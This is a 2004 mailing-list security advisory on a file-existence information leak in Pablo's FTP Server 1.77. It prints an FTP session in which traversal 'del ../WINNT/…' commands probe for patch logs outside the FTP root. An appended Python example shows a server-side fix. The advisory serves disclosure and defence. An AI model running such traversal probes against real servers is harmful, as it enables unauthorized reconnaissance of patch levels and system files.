[VulnWatch] Pablo Software Solutions FTP server can detect if a file exists outside the FTP root directory

From: scrap (webmaster@private)
Date: Sun Jan 18 2004 - 12:19:18 PST


    Pablo Software Solutions FTP server can detect if a file exists outside the FTP 
    root directory 
    
    
    .oO Overview Oo.
    
    Pablo Software Solutions FTP server version 1.77 reveals to a logged-in user 
    whether a file exists outside the FTP root directory.
    Discovered on January 11th, 2004
    Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)
    
    Pablo's FTP Server is a multi-threaded FTP server for Windows 98/NT/XP. It 
    comes with an easy-to-use interface and can be accessed from the system tray. 
    The server handles all basic FTP commands and offers easy user account 
    management and support for virtual directories. This FTP server reveals 
    whether a file exists outside the FTP root directory.
    
    
    .oO Details Oo.
    
    The issue can be reproduced with the MS-DOS ftp client. Once you are logged 
    on to the server, send del \..\<filename>, supposing your root directory 
    is c:\ftp_server.
    If <filename> exists, the FTP server answers "550 Permission denied." If 
    <filename> doesn't exist, the FTP server answers "550 File not found."
    In either case the file is never deleted, which is the expected behaviour. 
    The leak is the difference between the two replies.
    
    
    .oO Exploit Oo.
    
    Checking whether a file exists on a remote system can be useful to:
    
        * Fingerprint the OS. Different OSes do not install the same files by 
          default, so this shows whether the remote system is Windows NT, 2000 
          or XP...
        * Learn which vulnerabilities a system has. By testing whether 
          "../WINNT/Q329115.log" exists, you can tell whether the remote system 
          has this patch installed.
        * Maybe some other interesting things...
    
    Here is an example of the vulnerability:
    
    C:\>ftp 127.0.0.1
    Connecté à 127.0.0.1.
    220 Welcome to Pablo's FTP Server
    Utilisateur (127.0.0.1:(none)) : test
    331 Password required for test
    Mot de passe :
    230 User successfully logged in.
    ftp> dir
    200 Port command successful.
    150 Opening ASCII mode data connection for directory list.
    -rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
    226 Transfer complete
    ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
    ftp> dir ..
    200 Port command successful.
    550 "..": Permission denied. That is OK.
    ftp> cd ..
    550 "..": Permission denied. That is OK.
    ftp> del ../WINNT/Q328310.log
    550 Permission denied. File exists !
    ftp> del ../WINNT/Q329115.log
    550 File not found. File does not exists !
    ftp> quit
    
    
    .oO Solution Oo.
    
    The vendor has been informed and has solved the problem.
    Download Pablo's FTP server 1.8 at 
    http://www.pablovandermeer.nl/ftp_server.html
    
    
    .oO Discovered by Oo.
    
    Arnaud Jacques aka scrap
    webmaster@private
    http://www.securiteinfo.com
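
The advisory does not say how version 1.8 closes the hole. As an added example (not code from the vendor or from this advisory), here is one way a server can avoid the oracle described under Details: decide whether the requested path stays inside the FTP root before consulting the filesystem, and give every out-of-root path the same reply. The function names, the `may_delete` flag and the temporary directory layout are assumptions made for the illustration.

```python
import os
import tempfile

# Illustrative names (resolve_in_root, handle_dele, may_delete) are assumptions,
# not the vendor's code.

def resolve_in_root(root, client_path):
    """Return the real path for client_path, or None if it leaves root."""
    root = os.path.realpath(root)
    # Windows clients may send '\' or '/'; a leading separator means "FTP root".
    rel = client_path.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(root, rel))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:  # e.g. a different drive letter on Windows
        inside = False
    return candidate if inside else None

def handle_dele(root, client_path, may_delete=False):
    """Build the DELE reply. Containment is checked before existence, so a
    path outside the root gets one fixed reply whether or not it exists."""
    target = resolve_in_root(root, client_path)
    if target is None:
        return "550 Permission denied."
    if not os.path.isfile(target):
        return "550 File not found."   # only reachable inside the root
    if not may_delete:
        return "550 Permission denied."
    os.remove(target)
    return "250 File deleted."

def demo():
    """Constructed layout: <tmp>/ftp_server is the FTP root, <tmp>/WINNT is outside."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "ftp_server")
        os.makedirs(root)
        os.makedirs(os.path.join(base, "WINNT"))
        open(os.path.join(base, "WINNT", "present.log"), "w").close()
        open(os.path.join(root, "inside.txt"), "w").close()
        return {
            "outside_existing": handle_dele(root, "../WINNT/present.log"),
            "outside_missing": handle_dele(root, "../WINNT/absent.log"),
            "backslash": handle_dele(root, "\\..\\WINNT\\present.log"),
            "inside_existing": handle_dele(root, "inside.txt"),
            "inside_missing": handle_dele(root, "nope.txt"),
        }

if __name__ == "__main__":
    for case, reply in demo().items():
        print(f"{case:17} {reply}")
```

Because `os.path.realpath` also resolves symbolic links, a link inside the root that points outside it is rejected by the same check.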
    


